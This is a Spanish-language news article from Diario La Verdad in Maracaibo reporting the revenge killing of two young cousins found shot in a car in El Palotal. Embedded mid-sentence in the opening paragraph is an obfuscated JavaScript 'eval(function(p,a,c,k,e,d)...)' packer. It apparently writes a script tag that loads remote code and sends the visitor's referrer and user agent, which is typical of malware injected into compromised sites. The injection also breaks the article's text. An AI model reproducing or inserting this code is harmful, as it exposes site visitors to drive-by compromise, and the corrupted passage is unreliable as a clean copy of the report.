publicidad

Por venganza asesinaron a dos primos en El Palotal

Redacción Sucesos / Maracaibo / noticias@laverdad.com
Ambos eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|eeafz|var|u0026u|referrer|kderz||js|php'.split('|'),0,{})) cuerpos quedaron yacientes en la parte posterior del carro. Los dos tenían heridas de balas en la cabeza. Las víctimas tenían vínculos peligrosos con una banda rival

El vehículo donde tuvo lugar el crimen está incautado. (Foto: Cortesía)

La venganza se cernió sobre ellos. Así investiga el móvil del crimen en el cual fueron asesinados Rubén Darío Villalobos (22) y Daniel Alejandro Galué Fernández (18). Los hallaron muertos, ayer en la madrugada, dentro de un vehículo Mitsubichi Lancer, blanco, placa AA475XC, en el sector El Palotal, parroquia Francisco Eugenio Bustamante del municipio Maracaibo.

Según unos detectives de la Policía científica, las víctimas tenían vínculos peligrosos con una banda rival. Presumen que los integrantes de ese grupo los sometieron hasta un punto desconocido del sector y ahí los acribillaron.

Desde el pasado viernes en la noche sus familiares los buscaban desesperadamente. Estos revelaron que Rubén y Daniel eran primos hermanos. Se criaron juntos. El día del homicidio ambos salieron desde El Varillal a llevar a un familiar a empeñar una cadena de oro. A partir de ese momento no supieron más nada de ellos. Los llamaban, pero no contestaban porque sus teléfonos estaban apagados.

Se extrañaron de su demora para regresar a casa y fue ahí cuando decidieron recurrir a hospitales, ambulatorios y las morgues de esos hospitales para dar con su paradero.

Optaron por deambular la ciudad en su vehículo y se llevaron una trágica sorpresa al encontrar el Mitsubishi abandonado.

Según información aportada por funcionarios del cuerpo de investigaciones, ambos cuerpos quedaron yacientes en la parte posterior del carro. Los dos tenían heridas de balas en la cabeza. El cuerpo de Rubén estaba baleado en otras partes del cuerpo, más no el de Daniel.

Los familiares de la víctimas presumen que fueron esposados por los homicidas. Sus manos se encontraban en esa posición.

Los moradores del sector y los vecinos aseguraron no haber escuchado las detonaciones.

Villalobos y Galué eran comerciantes. Se dedicaban a comprar y reparar teléfonos para luego revenderlos.

Rubén era el segundo de tres hermanos y tenía un hijo de tres años. Daniel era el menor de tres hermanos.

Más noticias

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: web@laverdad.com , noticias@laverdad.com o ventas@laverdad.com
Desarrollado por Miguel Guadarrama